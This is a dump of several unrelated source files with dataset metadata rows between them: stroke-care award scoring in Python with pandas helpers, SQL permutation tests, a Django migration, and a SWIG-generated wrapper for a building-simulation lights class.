recan_therapy_lt_45min = x['% patients treated with door to recanalization therapy < 45 minutes']
if award != "STROKEREADY":
if (float(recan_therapy_lt_45min) <= 49.99):
if (award != "GOLD" or award == "DIAMOND"):
award = "PLATINUM"
elif (float(recan_therapy_lt_45min) >= 50):
if (award != "GOLD"):
award = "DIAMOND"
else:
award = "STROKEREADY"
recan_rate = x['% recanalization rate out of total ischemic incidence']
if award != "STROKEREADY":
if (float(recan_rate) >= 5 and float(recan_rate) <= 14.99):
if (award == "PLATINUM" or award == "DIAMOND"):
award = "GOLD"
elif (float(recan_rate) >= 15 and float(recan_rate) <= 24.99):
if (award == "DIAMOND"):
award = "PLATINUM"
elif (float(recan_rate) >= 25):
if (award == "DIAMOND"):
award = "DIAMOND"
else:
award = "STROKEREADY"
ct_mri = x['% suspected stroke patients undergoing CT/MRI']
if award != "STROKEREADY":
if (float(ct_mri) >= 80 and float(ct_mri) <= 84.99):
if (award == "PLATINUM" or award == "DIAMOND"):
award = "GOLD"
elif (float(ct_mri) >= 85 and float(ct_mri) <= 89.99):
if (award == "DIAMOND"):
award = "PLATINUM"
elif (float(ct_mri) >= 90):
if (award == "DIAMOND"):
award = "DIAMOND"
else:
award = "STROKEREADY"
dysphagia_screening = x['% all stroke patients undergoing dysphagia screening']
if award != "STROKEREADY":
if (float(dysphagia_screening) >= 80 and float(dysphagia_screening) <= 84.99):
if (award == "PLATINUM" or award == "DIAMOND"):
award = "GOLD"
elif (float(dysphagia_screening) >= 85 and float(dysphagia_screening) <= 89.99):
if (award == "DIAMOND"):
award = "PLATINUM"
elif (float(dysphagia_screening) >= 90):
if (award == "DIAMOND"):
award = "DIAMOND"
else:
award = "STROKEREADY"
discharged_with_antiplatelets_final = x['% ischemic stroke patients discharged (home) with antiplatelets']
if award != "STROKEREADY":
if (float(discharged_with_antiplatelets_final) >= 80 and float(discharged_with_antiplatelets_final) <= 84.99):
if (award == "PLATINUM" or award == "DIAMOND"):
award = "GOLD"
elif (float(discharged_with_antiplatelets_final) >= 85 and float(discharged_with_antiplatelets_final) <= 89.99):
if (award == "DIAMOND"):
award = "PLATINUM"
elif (float(discharged_with_antiplatelets_final) >= 90):
if (award == "DIAMOND"):
award = "DIAMOND"
else:
award = "STROKEREADY"
discharged_with_anticoagulants_final = x['% afib patients discharged (home) with anticoagulants']
if award != "STROKEREADY":
if (float(discharged_with_anticoagulants_final) >= 80 and float(discharged_with_anticoagulants_final) <= 84.99):
if (award == "PLATINUM" or award == "DIAMOND"):
award = "GOLD"
elif (float(discharged_with_anticoagulants_final) >= 85 and float(discharged_with_anticoagulants_final) <= 89.99):
if (award == "DIAMOND"):
award = "PLATINUM"
elif (float(discharged_with_anticoagulants_final) >= 90):
if (award == "DIAMOND"):
award = "DIAMOND"
else:
award = "STROKEREADY"
stroke_unit = x['% stroke patients treated in a dedicated stroke unit / ICU']
if award != "STROKEREADY":
if (float(stroke_unit) <= 0.99):
if (award == "DIAMOND"):
award = "PLATINUM"
elif (float(stroke_unit) >= 1):
if (award == "DIAMOND"):
award = "DIAMOND"
else:
award = "STROKEREADY"
return award
def _count_patients(self, dataframe):
""" The function calculating the number of patients per site.
:param dataframe: the dataframe with the raw data
:type dataframe: dataframe
:returns: the column with number of patients
"""
tmpDf = dataframe.groupby(['Protocol ID']).size().reset_index(name='count_patients')
factorDf = self.statsDf.merge(tmpDf, how='outer')
factorDf.fillna(0, inplace=True)
return factorDf['count_patients']
def _get_values_only_columns(self, column_name, value, dataframe):
""" The function calculating the numbeer of patients per site for the given value from the temporary dataframe.
:param column_name: the name of column name the number of patients should be calculated
:type column_name: str
:param value: the value for which we would like to get number of patients from the specific column
:type value: int
:param dataframe: the dataframe with the raw data
:type dataframe: pandas dataframe
:returns: the column with the number of patients
"""
tmpDf = dataframe[dataframe[column_name] == value].reset_index()[['Protocol ID', 'count']]
factorDf = self.statsDf.merge(tmpDf, how='outer')
factorDf.fillna(0, inplace=True)
return factorDf['count']
def _get_values_for_factors(self, column_name, value, new_column_name, df=None):
""" The function calculating the numbeer of patients per site for the given value from the temporary dataframe.
:param column_name: the name of column name the number of patients should be calculated
:type column_name: str
:param value: the value for which we would like to get number of patients from the specific column
:type value: int
:param new_column_name: to this value will be renamed the created column containing the number of patients
:type new_column_name: str
:param df: the dataframe with the raw data
:type df: pandas dataframe
:returns: the dataframe with calculated statistics
"""
# Check if type of column name is type of number, if not convert value into string
if (self.tmp[column_name].dtype != np.number):
value = str(value)
else:
value = value
tmpDf = self.tmp[self.tmp[column_name] == value].reset_index()[['Protocol ID', 'count']]
factorDf = self.statsDf.merge(tmpDf, how='outer')
factorDf.rename(columns={'count': new_column_name}, inplace=True)
factorDf.fillna(0, inplace=True)
return factorDf
def _get_values_for_factors_more_values(self, column_name, value, new_column_name, df=None):
""" The function calculating the number of patients per site for the given value from the temporary dataframe.
:param column_name: the name of column name the number of patients should be calculated
:type column_name: str
:param value: the list of values for which we would like to get number of patients from the specific column
:type value: list
:param new_column_name: to this value will be renamed the created column containing the number of patients
:type new_column_name: str
:param df: the dataframe with the raw data
:type df: pandas dataframe
:returns: the dataframe with calculated statistics
"""
if df is None:
tmpDf = self.tmp[self.tmp[column_name].isin(value)].reset_index()[['Protocol ID', 'count']]
tmpDf = tmpDf.groupby('Protocol ID').sum().reset_index()
factorDf = self.statsDf.merge(tmpDf, how='outer')
factorDf.rename(columns={'count': new_column_name}, inplace=True)
factorDf.fillna(0, inplace=True)
else:
tmpDf = df[df[column_name].isin(value)].reset_index()[['Protocol ID', 'count']]
tmpDf = tmpDf.groupby('Protocol ID').sum().reset_index()
factorDf = self.statsDf.merge(tmpDf, how='outer')
factorDf.rename(columns={'count': new_column_name}, inplace=True)
factorDf.fillna(0, inplace=True)
return factorDf
def _get_values_for_factors_containing(self, column_name, value, new_column_name, df=None):
""" The function calculating the number of patients per site for the given value from the temporary dataframe.
:param column_name: the name of column name the number of patients should be calculated
:type column_name: str
:param value: the value of string type for which we would like to get number of patients from the specific column
:type value: str
:param new_column_name: to this value will be renamed the created column containing the number of patients
:type new_column_name: str
:param df: the dataframe with the raw data
:type df: pandas dataframe
:returns: the dataframe with calculated statistics
"""
if df is None:
tmpDf = self.tmp[self.tmp[column_name].str.contains(value)].reset_index()[['Protocol ID', 'count']]
tmpDf = tmpDf.groupby('Protocol ID').sum().reset_index()
factorDf = self.statsDf.merge(tmpDf, how='outer')
factorDf.rename(columns={'count': new_column_name}, inplace=True)
factorDf.fillna(0, inplace=True)
else:
tmpDf = df[df[column_name].str.contains(value)].reset_index()[['Protocol ID', 'count']]
tmpDf = tmpDf.groupby('Protocol ID').sum().reset_index()
factorDf = self.statsDf.merge(tmpDf, how='outer')
factorDf.rename(columns={'count': new_column_name}, inplace=True)
factorDf.fillna(0, inplace=True)
return factorDf
def _get_ctmri_delta(self, hosp_time, ct_time):
""" The function calculating the difference between two times in minutes.
:param hosp_time: the time of hospitalization
:type hosp_time: time
:param ct_time: the time when CT/MRI was performed
:type ct_time: time
:returns: tdelta between two times in minutes
"""
timeformat = '%H:%M:%S'
# Check if both time are not None if yes, return 0 else return tdelta
if hosp_time is None or ct_time is None or pd.isnull(hosp_time) or pd.isnull(ct_time):
tdeltaMin = 0
elif hosp_time == 0 or ct_time == 0:
tdeltaMin = 0
else:
if isinstance(ct_time, time) and isinstance(hosp_time, time):
tdelta = datetime.combine(date.today(), ct_time) - datetime.combine(date.today(), hosp_time)
elif isinstance(ct_time, time):
tdelta = datetime.combine(date.today(), ct_time) - datetime.strptime(hosp_time, timeformat)
elif isinstance(hosp_time, time):
tdelta = datetime.strptime(ct_time, timeformat) - datetime.strptime(hosp_time, timeformat)
else:
tdelta = datetime.strptime(ct_time, timeformat) - datetime.strptime(hosp_time, timeformat)
tdeltaMin = tdelta.total_seconds()/60.0
if tdeltaMin > 60:
res = 2
elif tdeltaMin <= 60 and tdeltaMin > 0:
res = 1
else:
res = -2
return res
def _return_dataset(self):
""" The function returning dataframe. """
return self.df
def _return_stats(self):
""" The function returning the dataframe with the calculated statistics!
:returns: the dataframe with the statistics
"""
return self.statsDf
def _get_sites(self, df):
""" The function returning the list of sites in the preprocessed data.
:returns: the list of sites
"""
site_ids = df['Site ID'].tolist()
site_list = list(set(site_ids))
return site_list
@property
def country_name(self):
return self._country_name
| 96.405449
| 1,175
| 0.683898
| 30,957
| 240,628
| 5.086087
| 0.022515
| 0.078037
| 0.023398
| 0.042337
| 0.908384
| 0.873776
| 0.840152
| 0.807774
| 0.775383
| 0.73208
| 0
| 0.017137
| 0.179115
| 240,628
| 2,495
| 1,176
| 96.444088
| 0.779965
| 0.107901
| 0
| 0.316839
| 0
| 0
| 0.386846
| 0.079148
| 0
| 0
| 0
| 0
| 0
| 1
| 0.01551
| false
| 0
| 0.008124
| 0.000739
| 0.039143
| 0.000739
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
61a276c4ae721f1e18e33a6cdf82a3165f5b364f
| 3,994
|
py
|
Python
|
dqo/relational/tests/test_augmentation.py
|
danield137/deep_query_optimzation
|
01a25c966338007f15d14dea1b37e388e47bcfe3
|
[
"MIT"
] | null | null | null |
dqo/relational/tests/test_augmentation.py
|
danield137/deep_query_optimzation
|
01a25c966338007f15d14dea1b37e388e47bcfe3
|
[
"MIT"
] | null | null | null |
dqo/relational/tests/test_augmentation.py
|
danield137/deep_query_optimzation
|
01a25c966338007f15d14dea1b37e388e47bcfe3
|
[
"MIT"
] | null | null | null |
from dqo.db.tests.datasets import employees_db_w_meta
from dqo.relational import SQLParser
from dqo.relational import parse_tree
test_db = employees_db_w_meta()
def test_condition_permutation():
sql = """
SELECT MIN(employees.salary)
FROM employees
WHERE employees.id > 200
"""
rel_tree = SQLParser.to_relational_tree(sql)
permutations = rel_tree.permutations()
assert len(permutations) == 2
queries = [parse_tree(p, keep_order=True).to_sql(pretty=False, alias=False) for p in permutations]
# ensure all are different textually
for i in range(len(queries)):
for j in range(i + 1, len(queries)):
assert queries[i] != queries[j]
# ensure they are all semantically the same
sentry = permutations[0]
for p in permutations[1:]:
assert len(list(sentry.get_selections())) == len(list(p.get_selections()))
assert len(list(sentry.get_projections())) == len(list(p.get_projections()))
assert len(list(sentry.relations.keys())) == len(list(p.relations.keys()))
def test_join_permutation():
sql = """
SELECT MIN(employees.salary)
FROM employees, departments, companies
WHERE employees.id = departments.id AND companies.id = departments.id
"""
rel_tree = SQLParser.to_relational_tree(sql)
permutations = rel_tree.permutations()
assert len(permutations) == 4
queries = [parse_tree(p, keep_order=True).to_sql(pretty=False, alias=False) for p in permutations]
# ensure all are different textually
for i in range(len(queries)):
for j in range(i + 1, len(queries)):
assert queries[i] != queries[j]
# ensure they are all semantically the same
sentry = permutations[0]
for p in permutations[1:]:
assert len(list(sentry.get_selections())) == len(list(p.get_selections()))
assert len(list(sentry.get_projections())) == len(list(p.get_projections()))
assert len(list(sentry.relations.keys())) == len(list(p.relations.keys()))
def test_conditions_permutation():
sql = """
SELECT MIN(employees.salary)
FROM employees
WHERE employees.id > 1 AND employees.salary > 100 AND employees.salary < 200
"""
rel_tree = SQLParser.to_relational_tree(sql)
permutations = rel_tree.permutations()
# assert len(permutations) == 6
queries = [parse_tree(p, keep_order=True).to_sql(pretty=False, alias=False) for p in permutations]
# ensure all are different textually
for i in range(len(queries)):
for j in range(i + 1, len(queries)):
assert queries[i] != queries[j]
# ensure they are all semantically the same
sentry = permutations[0]
for p in permutations[1:]:
assert len(list(sentry.get_selections())) == len(list(p.get_selections()))
assert len(list(sentry.get_projections())) == len(list(p.get_projections()))
assert len(list(sentry.relations.keys())) == len(list(p.relations.keys()))
def test_join_and_selection_permutations():
sql = """
SELECT MIN(employees.salary)
FROM employees, departments
WHERE employees.id > 1 AND employees.dept_id = departments.id
"""
rel_tree = SQLParser.to_relational_tree(sql)
permutations = rel_tree.permutations()
# assert len(permutations) == 8
queries = [parse_tree(p, keep_order=True).to_sql(pretty=False, alias=False) for p in permutations]
# ensure all are different textually
for i in range(len(queries)):
for j in range(i + 1, len(queries)):
assert queries[i] != queries[j]
# ensure they are all semantically the same
sentry = permutations[0]
for p in permutations[1:]:
assert len(list(sentry.get_selections())) == len(list(p.get_selections()))
assert len(list(sentry.get_projections())) == len(list(p.get_projections()))
assert len(list(sentry.relations.keys())) == len(list(p.relations.keys()))
| 34.431034
| 102
| 0.662494
| 528
| 3,994
| 4.892045
| 0.136364
| 0.065041
| 0.060395
| 0.088269
| 0.897406
| 0.897406
| 0.881146
| 0.881146
| 0.837398
| 0.837398
| 0
| 0.008604
| 0.214321
| 3,994
| 115
| 103
| 34.730435
| 0.814532
| 0.091888
| 0
| 0.783784
| 0
| 0
| 0.160398
| 0.02323
| 0
| 0
| 0
| 0
| 0.243243
| 1
| 0.054054
| false
| 0
| 0.040541
| 0
| 0.094595
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
4ee532fd58e6d9d5f5133bca89673cde76f9ac90
| 1,580
|
py
|
Python
|
netbox/extras/migrations/0061_extras_change_logging.py
|
TheFlyingCorpse/netbox
|
a226f06b1beb575011d783b202d76cb74d3b1f79
|
[
"Apache-2.0"
] | 4,994
|
2019-07-01T13:15:44.000Z
|
2022-03-31T19:55:45.000Z
|
netbox/extras/migrations/0061_extras_change_logging.py
|
TheFlyingCorpse/netbox
|
a226f06b1beb575011d783b202d76cb74d3b1f79
|
[
"Apache-2.0"
] | 4,045
|
2019-07-01T14:24:09.000Z
|
2022-03-31T16:07:39.000Z
|
netbox/extras/migrations/0061_extras_change_logging.py
|
TheFlyingCorpse/netbox
|
a226f06b1beb575011d783b202d76cb74d3b1f79
|
[
"Apache-2.0"
] | 1,225
|
2019-07-01T15:34:03.000Z
|
2022-03-31T16:47:09.000Z
|
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('extras', '0060_customlink_button_class'),
]
operations = [
migrations.AddField(
model_name='customfield',
name='created',
field=models.DateField(auto_now_add=True, null=True),
),
migrations.AddField(
model_name='customfield',
name='last_updated',
field=models.DateTimeField(auto_now=True, null=True),
),
migrations.AddField(
model_name='customlink',
name='created',
field=models.DateField(auto_now_add=True, null=True),
),
migrations.AddField(
model_name='customlink',
name='last_updated',
field=models.DateTimeField(auto_now=True, null=True),
),
migrations.AddField(
model_name='exporttemplate',
name='created',
field=models.DateField(auto_now_add=True, null=True),
),
migrations.AddField(
model_name='exporttemplate',
name='last_updated',
field=models.DateTimeField(auto_now=True, null=True),
),
migrations.AddField(
model_name='webhook',
name='created',
field=models.DateField(auto_now_add=True, null=True),
),
migrations.AddField(
model_name='webhook',
name='last_updated',
field=models.DateTimeField(auto_now=True, null=True),
),
]
| 30.384615
| 65
| 0.563924
| 145
| 1,580
| 5.958621
| 0.213793
| 0.166667
| 0.212963
| 0.25
| 0.861111
| 0.861111
| 0.804398
| 0.804398
| 0.804398
| 0.732639
| 0
| 0.003735
| 0.322152
| 1,580
| 51
| 66
| 30.980392
| 0.802988
| 0
| 0
| 0.851064
| 0
| 0
| 0.122785
| 0.017722
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.021277
| 0
| 0.085106
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
f609ea1edf133c69b084cabfbd8b3cb1f4199f52
| 37
|
py
|
Python
|
heatmap/__init__.py
|
Bilal-Yousaf/heatmap
|
789907301f9663feca72fb84dffbe2de08869975
|
[
"MIT"
] | 5
|
2020-03-25T20:31:48.000Z
|
2021-04-23T09:53:50.000Z
|
heatmap/__init__.py
|
Bilal-Yousaf/HeatMap
|
789907301f9663feca72fb84dffbe2de08869975
|
[
"MIT"
] | null | null | null |
heatmap/__init__.py
|
Bilal-Yousaf/HeatMap
|
789907301f9663feca72fb84dffbe2de08869975
|
[
"MIT"
] | null | null | null |
from .heatmap import generate_heatmap
| 37
| 37
| 0.891892
| 5
| 37
| 6.4
| 0.8
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.081081
| 37
| 1
| 37
| 37
| 0.941176
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
f6228da345431023f7834e4201a3bb44d8f2ebe1
| 112
|
py
|
Python
|
backend/auth_app/serializers/__init__.py
|
nitinmehra/TodoApp
|
e1e8938330df6b59b8b064ac1a2dde61744d8392
|
[
"MIT"
] | null | null | null |
backend/auth_app/serializers/__init__.py
|
nitinmehra/TodoApp
|
e1e8938330df6b59b8b064ac1a2dde61744d8392
|
[
"MIT"
] | null | null | null |
backend/auth_app/serializers/__init__.py
|
nitinmehra/TodoApp
|
e1e8938330df6b59b8b064ac1a2dde61744d8392
|
[
"MIT"
] | null | null | null |
from .auth_serializer import MyTokenObtainPairSerializer
from .register_serializer import UserRegisterSerializer
| 56
| 56
| 0.919643
| 10
| 112
| 10.1
| 0.7
| 0.316832
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.0625
| 112
| 2
| 57
| 56
| 0.961905
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
9cb959cded414dc66d1ee592c294e6008ab6b58b
| 11,162
|
py
|
Python
|
SimModel_Python_API/simmodel_swig/Release/SimInternalLoad_Lights_Default.py
|
EnEff-BIM/EnEffBIM-Framework
|
6328d39b498dc4065a60b5cc9370b8c2a9a1cddf
|
[
"MIT"
] | 3
|
2016-05-30T15:12:16.000Z
|
2022-03-22T08:11:13.000Z
|
SimModel_Python_API/simmodel_swig/Release/SimInternalLoad_Lights_Default.py
|
EnEff-BIM/EnEffBIM-Framework
|
6328d39b498dc4065a60b5cc9370b8c2a9a1cddf
|
[
"MIT"
] | 21
|
2016-06-13T11:33:45.000Z
|
2017-05-23T09:46:52.000Z
|
SimModel_Python_API/simmodel_swig/Release/SimInternalLoad_Lights_Default.py
|
EnEff-BIM/EnEffBIM-Framework
|
6328d39b498dc4065a60b5cc9370b8c2a9a1cddf
|
[
"MIT"
] | null | null | null |
# This file was automatically generated by SWIG (http://www.swig.org).
# Version 3.0.7
#
# Do not make changes to this file unless you know what you are doing--modify
# the SWIG interface file instead.
from sys import version_info
if version_info >= (2, 6, 0):
def swig_import_helper():
from os.path import dirname
import imp
fp = None
try:
fp, pathname, description = imp.find_module('_SimInternalLoad_Lights_Default', [dirname(__file__)])
except ImportError:
import _SimInternalLoad_Lights_Default
return _SimInternalLoad_Lights_Default
if fp is not None:
try:
_mod = imp.load_module('_SimInternalLoad_Lights_Default', fp, pathname, description)
finally:
fp.close()
return _mod
_SimInternalLoad_Lights_Default = swig_import_helper()
del swig_import_helper
else:
import _SimInternalLoad_Lights_Default
del version_info
try:
_swig_property = property
except NameError:
pass # Python < 2.2 doesn't have 'property'.
def _swig_setattr_nondynamic(self, class_type, name, value, static=1):
if (name == "thisown"):
return self.this.own(value)
if (name == "this"):
if type(value).__name__ == 'SwigPyObject':
self.__dict__[name] = value
return
method = class_type.__swig_setmethods__.get(name, None)
if method:
return method(self, value)
if (not static):
if _newclass:
object.__setattr__(self, name, value)
else:
self.__dict__[name] = value
else:
raise AttributeError("You cannot add attributes to %s" % self)
def _swig_setattr(self, class_type, name, value):
return _swig_setattr_nondynamic(self, class_type, name, value, 0)
def _swig_getattr_nondynamic(self, class_type, name, static=1):
if (name == "thisown"):
return self.this.own()
method = class_type.__swig_getmethods__.get(name, None)
if method:
return method(self)
if (not static):
return object.__getattr__(self, name)
else:
raise AttributeError(name)
def _swig_getattr(self, class_type, name):
return _swig_getattr_nondynamic(self, class_type, name, 0)
def _swig_repr(self):
try:
strthis = "proxy of " + self.this.__repr__()
except:
strthis = ""
return "<%s.%s; %s >" % (self.__class__.__module__, self.__class__.__name__, strthis,)
try:
_object = object
_newclass = 1
except AttributeError:
class _object:
pass
_newclass = 0
try:
import weakref
weakref_proxy = weakref.proxy
except:
weakref_proxy = lambda x: x
import base
import SimInternalLoad_Equipment_Electric
class SimInternalLoad_Lights(SimInternalLoad_Equipment_Electric.SimInternalLoad):
__swig_setmethods__ = {}
for _s in [SimInternalLoad_Equipment_Electric.SimInternalLoad]:
__swig_setmethods__.update(getattr(_s, '__swig_setmethods__', {}))
__setattr__ = lambda self, name, value: _swig_setattr(self, SimInternalLoad_Lights, name, value)
__swig_getmethods__ = {}
for _s in [SimInternalLoad_Equipment_Electric.SimInternalLoad]:
__swig_getmethods__.update(getattr(_s, '__swig_getmethods__', {}))
__getattr__ = lambda self, name: _swig_getattr(self, SimInternalLoad_Lights, name)
__repr__ = _swig_repr
def SimInternalLoad_Name(self, *args):
return _SimInternalLoad_Lights_Default.SimInternalLoad_Lights_SimInternalLoad_Name(self, *args)
def SimInternalLoad_ZoneOrZoneListName(self, *args):
return _SimInternalLoad_Lights_Default.SimInternalLoad_Lights_SimInternalLoad_ZoneOrZoneListName(self, *args)
def SimInternalLoad_FracRadiant(self, *args):
return _SimInternalLoad_Lights_Default.SimInternalLoad_Lights_SimInternalLoad_FracRadiant(self, *args)
def SimInternalLoad_SchedName(self, *args):
return _SimInternalLoad_Lights_Default.SimInternalLoad_Lights_SimInternalLoad_SchedName(self, *args)
def SimInternalLoad_DesignLevelCalcMeth(self, *args):
return _SimInternalLoad_Lights_Default.SimInternalLoad_Lights_SimInternalLoad_DesignLevelCalcMeth(self, *args)
def SimInternalLoad_LightLevel(self, *args):
return _SimInternalLoad_Lights_Default.SimInternalLoad_Lights_SimInternalLoad_LightLevel(self, *args)
def SimInternalLoad_PowerPerZoneFloorArea(self, *args):
return _SimInternalLoad_Lights_Default.SimInternalLoad_Lights_SimInternalLoad_PowerPerZoneFloorArea(self, *args)
def SimInternalLoad_PowerPerPerson(self, *args):
return _SimInternalLoad_Lights_Default.SimInternalLoad_Lights_SimInternalLoad_PowerPerPerson(self, *args)
def SimInternalLoad_RtnAirFrac(self, *args):
return _SimInternalLoad_Lights_Default.SimInternalLoad_Lights_SimInternalLoad_RtnAirFrac(self, *args)
def SimInternalLoad_FracVisible(self, *args):
return _SimInternalLoad_Lights_Default.SimInternalLoad_Lights_SimInternalLoad_FracVisible(self, *args)
def SimInternalLoad_FracReplaceable(self, *args):
return _SimInternalLoad_Lights_Default.SimInternalLoad_Lights_SimInternalLoad_FracReplaceable(self, *args)
def SimInternalLoad_EndUseSubCat(self, *args):
return _SimInternalLoad_Lights_Default.SimInternalLoad_Lights_SimInternalLoad_EndUseSubCat(self, *args)
def SimInternalLoad_RtnAirFracCalcFromPlenTemp(self, *args):
return _SimInternalLoad_Lights_Default.SimInternalLoad_Lights_SimInternalLoad_RtnAirFracCalcFromPlenTemp(self, *args)
def SimInternalLoad_RtnAirFracFuncofPlenumTempCoef1(self, *args):
return _SimInternalLoad_Lights_Default.SimInternalLoad_Lights_SimInternalLoad_RtnAirFracFuncofPlenumTempCoef1(self, *args)
def SimInternalLoad_RtnAirFracFuncofPlenumTempCoef2(self, *args):
return _SimInternalLoad_Lights_Default.SimInternalLoad_Lights_SimInternalLoad_RtnAirFracFuncofPlenumTempCoef2(self, *args)
def __init__(self, *args):
this = _SimInternalLoad_Lights_Default.new_SimInternalLoad_Lights(*args)
try:
self.this.append(this)
except:
self.this = this
def _clone(self, f=0, c=None):
return _SimInternalLoad_Lights_Default.SimInternalLoad_Lights__clone(self, f, c)
__swig_destroy__ = _SimInternalLoad_Lights_Default.delete_SimInternalLoad_Lights
__del__ = lambda self: None
SimInternalLoad_Lights_swigregister = _SimInternalLoad_Lights_Default.SimInternalLoad_Lights_swigregister
SimInternalLoad_Lights_swigregister(SimInternalLoad_Lights)
class SimInternalLoad_Lights_Default(SimInternalLoad_Lights):
__swig_setmethods__ = {}
for _s in [SimInternalLoad_Lights]:
__swig_setmethods__.update(getattr(_s, '__swig_setmethods__', {}))
__setattr__ = lambda self, name, value: _swig_setattr(self, SimInternalLoad_Lights_Default, name, value)
__swig_getmethods__ = {}
for _s in [SimInternalLoad_Lights]:
__swig_getmethods__.update(getattr(_s, '__swig_getmethods__', {}))
__getattr__ = lambda self, name: _swig_getattr(self, SimInternalLoad_Lights_Default, name)
__repr__ = _swig_repr
def __init__(self, *args):
this = _SimInternalLoad_Lights_Default.new_SimInternalLoad_Lights_Default(*args)
try:
self.this.append(this)
except:
self.this = this
def _clone(self, f=0, c=None):
return _SimInternalLoad_Lights_Default.SimInternalLoad_Lights_Default__clone(self, f, c)
__swig_destroy__ = _SimInternalLoad_Lights_Default.delete_SimInternalLoad_Lights_Default
__del__ = lambda self: None
SimInternalLoad_Lights_Default_swigregister = _SimInternalLoad_Lights_Default.SimInternalLoad_Lights_Default_swigregister
SimInternalLoad_Lights_Default_swigregister(SimInternalLoad_Lights_Default)
class SimInternalLoad_Lights_Default_sequence(base.sequence_common):
__swig_setmethods__ = {}
for _s in [base.sequence_common]:
__swig_setmethods__.update(getattr(_s, '__swig_setmethods__', {}))
__setattr__ = lambda self, name, value: _swig_setattr(self, SimInternalLoad_Lights_Default_sequence, name, value)
__swig_getmethods__ = {}
for _s in [base.sequence_common]:
__swig_getmethods__.update(getattr(_s, '__swig_getmethods__', {}))
__getattr__ = lambda self, name: _swig_getattr(self, SimInternalLoad_Lights_Default_sequence, name)
__repr__ = _swig_repr
def __init__(self, *args):
this = _SimInternalLoad_Lights_Default.new_SimInternalLoad_Lights_Default_sequence(*args)
try:
self.this.append(this)
except:
self.this = this
def assign(self, n, x):
return _SimInternalLoad_Lights_Default.SimInternalLoad_Lights_Default_sequence_assign(self, n, x)
def begin(self, *args):
return _SimInternalLoad_Lights_Default.SimInternalLoad_Lights_Default_sequence_begin(self, *args)
def end(self, *args):
return _SimInternalLoad_Lights_Default.SimInternalLoad_Lights_Default_sequence_end(self, *args)
def rbegin(self, *args):
return _SimInternalLoad_Lights_Default.SimInternalLoad_Lights_Default_sequence_rbegin(self, *args)
def rend(self, *args):
return _SimInternalLoad_Lights_Default.SimInternalLoad_Lights_Default_sequence_rend(self, *args)
def at(self, *args):
return _SimInternalLoad_Lights_Default.SimInternalLoad_Lights_Default_sequence_at(self, *args)
def front(self, *args):
return _SimInternalLoad_Lights_Default.SimInternalLoad_Lights_Default_sequence_front(self, *args)
def back(self, *args):
return _SimInternalLoad_Lights_Default.SimInternalLoad_Lights_Default_sequence_back(self, *args)
def push_back(self, *args):
return _SimInternalLoad_Lights_Default.SimInternalLoad_Lights_Default_sequence_push_back(self, *args)
def pop_back(self):
return _SimInternalLoad_Lights_Default.SimInternalLoad_Lights_Default_sequence_pop_back(self)
def detach_back(self, pop=True):
return _SimInternalLoad_Lights_Default.SimInternalLoad_Lights_Default_sequence_detach_back(self, pop)
def insert(self, *args):
return _SimInternalLoad_Lights_Default.SimInternalLoad_Lights_Default_sequence_insert(self, *args)
def erase(self, *args):
return _SimInternalLoad_Lights_Default.SimInternalLoad_Lights_Default_sequence_erase(self, *args)
def detach(self, position, r, erase=True):
return _SimInternalLoad_Lights_Default.SimInternalLoad_Lights_Default_sequence_detach(self, position, r, erase)
def swap(self, x):
return _SimInternalLoad_Lights_Default.SimInternalLoad_Lights_Default_sequence_swap(self, x)
__swig_destroy__ = _SimInternalLoad_Lights_Default.delete_SimInternalLoad_Lights_Default_sequence
__del__ = lambda self: None
SimInternalLoad_Lights_Default_sequence_swigregister = _SimInternalLoad_Lights_Default.SimInternalLoad_Lights_Default_sequence_swigregister
SimInternalLoad_Lights_Default_sequence_swigregister(SimInternalLoad_Lights_Default_sequence)
# This file is compatible with both classic and new-style classes.
| 41.805243
| 139
| 0.760796
| 1,195
| 11,162
| 6.557322
| 0.133054
| 0.292113
| 0.289433
| 0.19755
| 0.65952
| 0.630168
| 0.60171
| 0.555258
| 0.49464
| 0.29071
| 0
| 0.002148
| 0.16592
| 11,162
| 266
| 140
| 41.962406
| 0.839527
| 0.026339
| 0
| 0.323383
| 1
| 0
| 0.023761
| 0.00571
| 0
| 0
| 0
| 0
| 0
| 1
| 0.20398
| false
| 0.00995
| 0.059701
| 0.169154
| 0.60199
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
